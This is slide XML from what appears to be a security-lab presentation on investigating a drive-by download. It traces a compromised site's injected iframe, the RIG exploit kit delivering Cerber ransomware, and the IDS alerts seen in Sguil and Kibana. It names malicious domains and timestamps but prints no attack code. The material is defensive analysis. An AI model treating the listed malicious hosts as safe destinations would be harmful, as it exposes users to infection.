          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">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ROOT CAUSE ANALYSIS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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6" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2282398"/>
            <a:ext cx="18288000" cy="2956560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Underlying Cause</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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•-The root cause of the incident was the compromise of the legitimate website homeimprovement.com. The website had been unknowingly compromised by attackers, who injected malicious code into its HTML. This code, an iframe containing a hidden link to ty.benme.com, redirected visitors to a malicious domain.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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•-The redirection was a critical part of a larger drive-by attack that exploited vulnerabilities in the user's browser and web plugins.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>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7" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="289778" y="5410408"/>
            <a:ext cx="17998222" cy="3328035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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Exploited Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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The RIG ExploitKit was used to take advantage of multiple vulnerabilities in the user's web browsing software, particularly in outdated browser plugins and extensions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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The EK delivered a malicious compressed file (in gzip format), which contained Cerberransomware. Once the file was downloaded and executed, the system would have been encrypted had the incident not been detected and contained quickly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2940"/>
              </a:lnSpc>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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4684068" y="6995338"/>
            <a:ext cx="10231226" cy="3291662"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10231226" h="3291662">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10231226" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10231226" y="3291662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3291662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4058286" y="1076325"/>
            <a:ext cx="8843279" cy="27698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p>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                                                                                                 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="7215"/>
              </a:lnSpc>
            </a:pP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861786" y="1998662"/>
            <a:ext cx="16230600" cy="3863975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>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 Snort NIDS:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pP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800"/>
              </a:lnSpc>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 Function: Network Intrusion Detection System that detected suspicious activity and alertedthe Security Operations Center(SOC) team regarding the drive-by download attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pP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800"/>
              </a:lnSpc>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 Security Onion:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pP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800"/>
              </a:lnSpc>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•Function: A Linux distribution for intrusion detection, log management, and networksecurity monitoring that helped in the identification and analysis of the attack.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
            </a:pP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800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178832" y="5681980"/>
            <a:ext cx="17930337" cy="1656715"/>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 Sguil:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pP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 Function: A GUI-based tool for monitoring and analyzing securityalerts, which the SOC analysts used to investigate the alerts triggered by the Snort NIDS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="2660"/>
              </a:lnSpc>
            </a:pP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660"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pP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t="7080" r="30594"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="67310" y="591185"/>
            <a:ext cx="10076815" cy="8808720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10485120" y="1028700"/>
            <a:ext cx="6954520" cy="3108325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>the timestamps for the first and last of the alerts that occurred within about a </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="2628900"/>
            <a:ext cx="6346825" cy="1508125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="155724"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
              </a:rPr>
              <a:t>22:54:42 to 22:55:28 The entire exploit occurred in less than a minute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3" descr="m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71500"/>
            <a:ext cx="8844280" cy="8263890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10506075" y="1333500"/>
            <a:ext cx="5927725" cy="2028190"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>According to the IDS signature rule which malware family triggered this alert</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10820400" y="3314383"/>
            <a:ext cx="5080000" cy="953135"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="0" algn="l" defTabSz="266700">
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="Aptos"/>
              </a:rPr>
              <a:t>Malware_family PseudoDarkLeech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5" y="153035"/>
            <a:ext cx="10098405" cy="8689340"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Box 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11201400" y="2171700"/>
            <a:ext cx="5080000" cy="1286510"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t> kind of request was involved:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>HTTP/1.1 GET request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Box 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11106150" y="3848100"/>
            <a:ext cx="5080000" cy="1209675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>The files requested are:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Aptos"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>dle_js.js</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11106150" y="5219700"/>
            <a:ext cx="5080000" cy="4777105"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>the URL for the referer and the host website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>The referer website was www.homeimprovement.com/remodeling-your-kitchen-cabinets.html and the host website was retrotip.visionbura.com.ve.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t> the content encoded:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="266700" fontAlgn="base">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1100"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                <a:ea typeface="sans-serif"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10972800" y="571817"/>
            <a:ext cx="5080000" cy="1383665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-228600" defTabSz="266700">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>a. choose </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Transcript</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> to open a transcript of the conversation.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sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Freeform 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2952399" y="4090779"/>
            <a:ext cx="12383201" cy="4779302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12383201" h="4779302">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12383202" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12383202" y="4779302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4779302"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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12</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2302127" y="1076325"/>
            <a:ext cx="8094686" cy="9410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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217763" y="2417445"/>
            <a:ext cx="17472719" cy="1934845"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>• Kibana:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Open Sans"/>
              <a:ea typeface="Open Sans"/>
              <a:cs typeface="Open Sans"/>
              <a:sym typeface="Open Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans"/>
                <a:ea typeface="Open Sans"/>
                <a:cs typeface="Open Sans"/>
                <a:sym typeface="Open Sans"/>
              </a:rPr>
              <a:t>Function: A data visualization tool for Elasticsearch that helped the SOC team analyzelogs and visualizesuspicious activities and patterns during the incident.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPts val="3080"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>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9600" y="222250"/>
            <a:ext cx="10943590" cy="4729480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Box 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12268200" y="2552700"/>
            <a:ext cx="5080000" cy="5140960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="266700">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Zoom in on the event by clicking and dragging in the NIDS – Alerts Over Time visualization further focus in on the event timeframe. Since the event happened over a very short period of time, sel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>ect just the grap</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>h plot line. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 14" descr="screenshot of the first event highligh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0" y="5074920"/>
            <a:ext cx="11031855" cy="47771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7887442" y="2058006"/>
            <a:ext cx="2513117" cy="2550211"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2513117" h="2550211">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2513116" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2513116" y="2550210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2550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779686" y="2704313"/>
            <a:ext cx="728628" cy="987058"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="728628" h="987058">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="728628" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="728628" y="987057"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9870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4" name="TextBox 14"/>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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2579485" y="4479868"/>
            <a:ext cx="14339818" cy="7750155"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="15400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="110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INVESTIGATING A MALWARE EXPLOIT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="15400"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="110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ctr">
              <a:lnSpc>
